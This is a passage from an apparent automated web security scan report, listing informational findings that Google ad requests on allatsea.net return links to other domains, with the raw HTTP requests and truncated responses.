GET /pagead/ads?client=ca-pub-9585000347357330&output=html&h=60&slotname=9318179706&w=468&lmt=1304752004&flash=10.2.154&url=http%3A%2F%2Fallatsea.net%2F&dt=1304734004015&bpp=1&shv=r20110427&jsv=r20110427&prev_slotnames=6980537247%2C8399079020&correlator=1304734002949&frm=0&adk=1407256996&ga_vid=126629396.1304734000&ga_sid=1304734000&ga_hid=782758865&ga_fc=1&u_tz=-300&u_his=2&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=45&biw=1050&bih=968&eid=33895213&fu=0&ifi=3&dtd=530&gcv=gcm_8b3e97d1045ac48216d6355dac344a85.js HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; __ar_v4=%7C33IKJE45JFAHDG4ETT36VB%3A20110502%3A1%7CGTBIFU6YRNFJRK4GS5AK4B%3A20110502%3A1%7CN34ZPOW5TRGMJKDEFHM2G4%3A20110502%3A1%7CU6PZANHGRBHQFBIDRUUZ3E%3A20110502%3A1; id=22fba3001601008d|1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,1676624/667470/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Fri, 06 May 2011 21:06:48 GMT
Server: cafe
Cache-Control: private
X-XSS-Protection: 1; mode=block
Content-Length: 4181

<html><head><style><!--
a:link { color: #ffffff }a:visited { color: #ffffff }a:hover { color: #ffffff }a:active { color: #ffffff } --></style><script><!--
(function(){window.ss=function(d,e){window.s
...[SNIP]...
<div id=abgb><img src='http://pagead2.googlesyndication.com/pagead/images/i.png' alt="(i)" border=0 height=12px width=12px/></div><div id=abgs><a href="http://www.google.com/url?ct=abg&amp;q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://www.allatsea.net/%26hl%3Den%26client%3Dca-pub-9585000347357330%26adU%3Dwww.NassauParadiseIsland.com%26adT%3DImageAd%26gl%3DUS&amp;usg=AFQjCNFy9WQk7MtTBkfwGLgFL5r4VdNhXA" target=_blank><img alt="Ads by Google" border=0 height=16px src=http://pagead2.googlesyndication.com/pagead/abglogo/abg-en-100c-ffffff.png width=78px/></a>
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/js/graphics.js"></script><script src="http://pagead2.googlesyndication.com/pagead/js/abg.js"></script>
...[SNIP]...
24.25. http://googleads.g.doubleclick.net/pagead/ads  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /pagead/ads?client=ca-pub-9585000347357330&output=html&h=125&slotname=8399079020&w=125&lmt=1304752004&flash=10.2.154&url=http%3A%2F%2Fallatsea.net%2F&dt=1304734003984&bpp=1&shv=r20110427&jsv=r20110427&prev_slotnames=6980537247&correlator=1304734002949&frm=0&adk=539767575&ga_vid=126629396.1304734000&ga_sid=1304734000&ga_hid=782758865&ga_fc=1&u_tz=-300&u_his=2&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=45&biw=1050&bih=968&eid=33895213&fu=0&ifi=2&dtd=520&gcv=gcm_8b3e97d1045ac48216d6355dac344a85.js HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; __ar_v4=%7C33IKJE45JFAHDG4ETT36VB%3A20110502%3A1%7CGTBIFU6YRNFJRK4GS5AK4B%3A20110502%3A1%7CN34ZPOW5TRGMJKDEFHM2G4%3A20110502%3A1%7CU6PZANHGRBHQFBIDRUUZ3E%3A20110502%3A1; id=22fba3001601008d|1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,1676624/667470/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Fri, 06 May 2011 21:06:47 GMT
Server: cafe
Cache-Control: private
X-XSS-Protection: 1; mode=block
Content-Length: 10920

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><style>a:link,a:visited,a:hover,a:active{color:#0000ff;cursor:pointer;}body,table,div,ul,li{font-s
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/js/graphics.js"></script>
...[SNIP]...
<div id=abgi><a href="http://www.google.com/url?ct=abg&amp;q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://www.allatsea.net/%26hl%3Den%26client%3Dca-pub-9585000347357330%26adU%3Dwww.positivesearchresults.com%26adT%3DOnline%2BReputation%2BRuined%253F%26gl%3DUS&amp;usg=AFQjCNH5VCD4GgSFN1IIqriKcBmAyJG9wA" target=_blank><img alt="Ads by Google" border=0 height=16 src="http://pagead2.googlesyndication.com/pagead/abglogo/abg-en-100c-ffffff.png" width=78></a>
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/sma8.js"></script>
...[SNIP]...
24.26. http://googleads.g.doubleclick.net/pagead/ads  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /pagead/ads?client=ca-pub-9585000347357330&output=html&h=250&slotname=6980537247&w=300&lmt=1304752205&flash=10.2.154&url=http%3A%2F%2Fallatsea.net%2Fby-category%2FDeep_Sea_Fishing&dt=1304734205666&bpp=3&shv=r20110427&jsv=r20110427&correlator=1304734205671&frm=0&adk=1325892488&ga_vid=126629396.1304734000&ga_sid=1304734000&ga_hid=1678263349&ga_fc=1&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=45&biw=1066&bih=968&eid=36813005&fu=0&ifi=1&dtd=8&xpc=kyhcYo9ex1&p=http%3A//allatsea.net HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; __ar_v4=%7C33IKJE45JFAHDG4ETT36VB%3A20110502%3A1%7CGTBIFU6YRNFJRK4GS5AK4B%3A20110502%3A1%7CN34ZPOW5TRGMJKDEFHM2G4%3A20110502%3A1%7CU6PZANHGRBHQFBIDRUUZ3E%3A20110502%3A1; id=22fba3001601008d|1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,1676624/667470/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Fri, 06 May 2011 21:10:08 GMT
Server: cafe
Cache-Control: private
X-XSS-Protection: 1; mode=block
Content-Length: 4517

<html><head><style><!--
a:link { color: #ffffff }a:visited { color: #ffffff }a:hover { color: #ffffff }a:active { color: #ffffff } --></style><script><!--
(function(){window.ss=function(d,e){window.s
...[SNIP]...
<div id=abgb><img src='http://pagead2.googlesyndication.com/pagead/images/i.png' alt="(i)" border=0 height=12px width=12px/></div><div id=abgs><a href="http://www.google.com/url?ct=abg&amp;q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://www.allatsea.net/by-category/Deep_Sea_Fishing%26hl%3Den%26client%3Dca-pub-9585000347357330%26adU%3Dwww.Reputation.com%26adT%3DImageAd%26gl%3DUS&amp;usg=AFQjCNG-pz-apHIpKo6j4toatFd6twBevA" target=_blank><img alt="Ads by Google" border=0 height=16px src=http://pagead2.googlesyndication.com/pagead/abglogo/abg-en-100c-ffffff.png width=78px/></a>
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/js/graphics.js"></script><script src="http://pagead2.googlesyndication.com/pagead/js/abg.js"></script>
...[SNIP]...
24.27. http://googleads.g.doubleclick.net/pagead/ads  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /pagead/ads?client=ca-pub-9585000347357330&output=html&h=250&slotname=6980537247&w=300&lmt=1304752201&flash=10.2.154&url=http%3A%2F%2Fallatsea.net%2Fby-category%2FSailing_Regatta&dt=1304734201230&bpp=31&shv=r20110427&jsv=r20110427&correlator=1304734201269&frm=0&adk=1325892488&ga_vid=126629396.1304734000&ga_sid=1304734000&ga_hid=2085234118&ga_fc=1&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=45&biw=1066&bih=968&eid=33895150&fu=0&ifi=1&dtd=95&xpc=i9300IuNWr&p=http%3A//allatsea.net HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; __ar_v4=%7C33IKJE45JFAHDG4ETT36VB%3A20110502%3A1%7CGTBIFU6YRNFJRK4GS5AK4B%3A20110502%3A1%7CN34ZPOW5TRGMJKDEFHM2G4%3A20110502%3A1%7CU6PZANHGRBHQFBIDRUUZ3E%3A20110502%3A1; id=22fba3001601008d|1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,1676624/667470/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Fri, 06 May 2011 21:10:59 GMT
Server: cafe
Cache-Control: private
X-XSS-Protection: 1; mode=block
Content-Length: 13219

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><style>a:link,a:visited,a:hover,a:active{color:#0000ff;cursor:pointer;}body,table,div,ul,li{font-s
...[SNIP]...
<div id=abgi><a href="http://www.google.com/url?ct=abg&amp;q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://www.allatsea.net/by-category/Sailing_Regatta%26hl%3Den%26client%3Dca-pub-9585000347357330%26adU%3Dwww.ADT.com%26adT%3DADT%25C2%25AE%2BHome%2B-%2BOfficial%2BSite%26adU%3Dwww.Tripology.com/Honeymoon%26adT%3DHoneymoon%2BPackages%26adU%3Dwww.Groupon.com%26adT%3DLocal%2BCoupons%26adU%3Dwww.Moxiesoft.com%26adT%3DKnowledge%2BBase%2BSoftware%26gl%3DUS&amp;usg=AFQjCNHMPZesw_CxtNWb54AoUkFNRwL2Ug" target=_blank><img alt="Ads by Google" border=0 height=16 src="http://pagead2.googlesyndication.com/pagead/abglogo/abg-en-100c-000000.png" width=78></a>
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/sma8.js"></script>
...[SNIP]...
24.28. http://googleads.g.doubleclick.net/pagead/ads  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /pagead/ads?client=ca-pub-9585000347357330&output=html&h=125&slotname=8399079020&w=125&lmt=1302507948&flash=10.2.154&url=http%3A%2F%2Fallatsea.net%2Fsubscribe.htm&dt=1304734213787&bpp=1&shv=r20110427&jsv=r20110427&prev_slotnames=6980537247&correlator=1304734213778&frm=0&adk=539767575&ga_vid=126629396.1304734000&ga_sid=1304734000&ga_hid=1638908820&ga_fc=1&u_tz=-300&u_his=3&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=45&biw=1050&bih=968&ref=http%3A%2F%2Fallatsea.net%2F&fu=0&ifi=2&dtd=157&xpc=mFghmfdQKf&p=http%3A//allatsea.net HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; __ar_v4=%7C33IKJE45JFAHDG4ETT36VB%3A20110502%3A1%7CGTBIFU6YRNFJRK4GS5AK4B%3A20110502%3A1%7CN34ZPOW5TRGMJKDEFHM2G4%3A20110502%3A1%7CU6PZANHGRBHQFBIDRUUZ3E%3A20110502%3A1; id=22fba3001601008d|1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,1676624/667470/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Fri, 06 May 2011 21:13:12 GMT
Server: cafe
Cache-Control: private
X-XSS-Protection: 1; mode=block
Content-Length: 11012

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><style>a:link,a:visited,a:hover,a:active{color:#0000ff;cursor:pointer;}body,table,div,ul,li{font-s
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/js/graphics.js"></script>
...[SNIP]...
<div id=abgi><a href="http://www.google.com/url?ct=abg&amp;q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://www.allatsea.net/subscribe.htm%26hl%3Den%26client%3Dca-pub-9585000347357330%26adU%3Dwww.LivingSocial.com/Baltimore%26adT%3DBaltimore%2BCoupons%26gl%3DUS&amp;usg=AFQjCNFDXwNauZ_FT8cxtTRPbDydFVx4vQ" target=_blank><img alt="Ads by Google" border=0 height=16 src="http://pagead2.googlesyndication.com/pagead/abglogo/abg-en-100c-ffffff.png" width=78></a>
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/sma8.js"></script>
...[SNIP]...
24.29. http://googleads.g.doubleclick.net/pagead/ads  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /pagead/ads?client=ca-pub-9585000347357330&output=html&h=125&slotname=8399079020&w=125&lmt=1304752202&flash=10.2.154&url=http%3A%2F%2Fallatsea.net%2Fby-category%2FSailing_Regatta&dt=1304734202631&bpp=1&shv=r20110427&jsv=r20110427&prev_slotnames=6980537247&correlator=1304734201269&frm=0&adk=539767575&ga_vid=126629396.1304734000&ga_sid=1304734000&ga_hid=2085234118&ga_fc=1&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=45&biw=1050&bih=968&eid=33895150&fu=0&ifi=2&dtd=30&xpc=jfYtMK2yId&p=http%3A//allatsea.net HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; __ar_v4=%7C33IKJE45JFAHDG4ETT36VB%3A20110502%3A1%7CGTBIFU6YRNFJRK4GS5AK4B%3A20110502%3A1%7CN34ZPOW5TRGMJKDEFHM2G4%3A20110502%3A1%7CU6PZANHGRBHQFBIDRUUZ3E%3A20110502%3A1; id=22fba3001601008d|1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,1676624/667470/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Fri, 06 May 2011 21:10:59 GMT
Server: cafe
Cache-Control: private
X-XSS-Protection: 1; mode=block
Content-Length: 11213

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><style>a:link,a:visited,a:hover,a:active{color:#0000ff;cursor:pointer;}body,table,div,ul,li{font-s
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/js/graphics.js"></script>
...[SNIP]...
<div id=abgi><a href="http://www.google.com/url?ct=abg&amp;q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://www.allatsea.net/by-category/Sailing_Regatta%26hl%3Den%26client%3Dca-pub-9585000347357330%26adU%3Dwww.Reputation.com%26adT%3DReputation.com%2B-%2BOfficial%26gl%3DUS&amp;usg=AFQjCNGLGkDArgDzw_8Gy8K58OYcNwyrTw" target=_blank><img alt="Ads by Google" border=0 height=16 src="http://pagead2.googlesyndication.com/pagead/abglogo/abg-en-100c-ffffff.png" width=78></a>
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/sma8.js"></script>
...[SNIP]...
24.30. http://googleads.g.doubleclick.net/pagead/ads  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /pagead/ads?client=ca-pub-9585000347357330&output=html&h=250&slotname=6980537247&w=300&lmt=1304752002&flash=10.2.154&url=http%3A%2F%2Fallatsea.net%2F&dt=1304734002923&bpp=4&shv=r20110427&jsv=r20110427&correlator=1304734002949&frm=0&adk=1325892488&ga_vid=126629396.1304734000&ga_sid=1304734000&ga_hid=782758865&ga_fc=1&u_tz=-300&u_his=2&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=45&biw=1050&bih=968&eid=33895213&fu=0&ifi=1&dtd=1522&gcv=gcm_8b3e97d1045ac48216d6355dac344a85.js HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; __ar_v4=%7C33IKJE45JFAHDG4ETT36VB%3A20110502%3A1%7CGTBIFU6YRNFJRK4GS5AK4B%3A20110502%3A1%7CN34ZPOW5TRGMJKDEFHM2G4%3A20110502%3A1%7CU6PZANHGRBHQFBIDRUUZ3E%3A20110502%3A1; id=22fba3001601008d|1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,1676624/667470/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Fri, 06 May 2011 21:06:48 GMT
Server: cafe
Cache-Control: private
X-XSS-Protection: 1; mode=block
Content-Length: 12914

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><style>a:link,a:visited,a:hover,a:active{color:#0000ff;cursor:pointer;}body,table,div,ul,li{font-s
...[SNIP]...
<div id=abgi><a href="http://www.google.com/url?ct=abg&amp;q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://www.allatsea.net/%26hl%3Den%26client%3Dca-pub-9585000347357330%26adU%3Dwww.Moxiesoft.com%26adT%3DKnowledge%2BBase%2BSoftware%26adU%3Dwww.WindstarWeeklyDeals.com%26adT%3DCaribbean%2BCruise%2BDeals%26adU%3Dwww.Expedia.com%26adT%3DSantiago%2BVacation%26adU%3DLuxuryRetreats.com/Private-Islands%26adT%3DAntigua%2BIsland%26gl%3DUS&amp;usg=AFQjCNHVtF7BU--So_umyzIlCv-rmJd8-w" target=_blank><img alt="Ads by Google" border=0 height=16 src="http://pagead2.googlesyndication.com/pagead/abglogo/abg-en-100c-000000.png" width=78></a>
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/sma8.js"></script>
...[SNIP]...
24.31. http://googleads.g.doubleclick.net/pagead/ads  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /pagead/ads?client=ca-pub-9585000347357330&output=html&h=125&slotname=8399079020&w=125&lmt=1304752228&flash=10.2.154&url=http%3A%2F%2Fallatsea.net%2Fdirectclassifieds.php%3FmenuCategories%3D8&dt=1304734228445&bpp=1&shv=r20110427&jsv=r20110427&prev_slotnames=6980537247&correlator=1304734228437&frm=0&adk=539767575&ga_vid=126629396.1304734000&ga_sid=1304734000&ga_hid=1066810904&ga_fc=1&u_tz=-300&u_his=4&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=45&biw=1050&bih=968&eid=33895150&ref=http%3A%2F%2Fallatsea.net%2Fsubscribe.htm&fu=0&ifi=2&dtd=13&xpc=SLzkQZURDd&p=http%3A//allatsea.net HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; __ar_v4=%7C33IKJE45JFAHDG4ETT36VB%3A20110502%3A1%7CGTBIFU6YRNFJRK4GS5AK4B%3A20110502%3A1%7CN34ZPOW5TRGMJKDEFHM2G4%3A20110502%3A1%7CU6PZANHGRBHQFBIDRUUZ3E%3A20110502%3A1; id=22fba3001601008d|1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,1676624/667470/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Fri, 06 May 2011 21:13:58 GMT
Server: cafe
Cache-Control: private
X-XSS-Protection: 1; mode=block
Content-Length: 11131

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><style>a:link,a:visited,a:hover,a:active{color:#0000ff;cursor:pointer;}body,table,div,ul,li{font-s
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/js/graphics.js"></script>
...[SNIP]...
<div id=abgi><a href="http://www.google.com/url?ct=abg&amp;q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://www.allatsea.net/directclassifieds.php%253FmenuCategories%253D8%26hl%3Den%26client%3Dca-pub-9585000347357330%26adU%3DFreshDeals.com%26adT%3D75%2525%2BOff%2BCaribbean%2BCruises%26gl%3DUS&amp;usg=AFQjCNG6iw7Vm7qoh5fcciSg_7-BDt9TkA" target=_blank><img alt="Ads by Google" border=0 height=16 src="http://pagead2.googlesyndication.com/pagead/abglogo/abg-en-100c-ffffff.png" width=78></a>
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/sma8.js"></script>
...[SNIP]...
24.32. http://googleads.g.doubleclick.net/pagead/ads  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

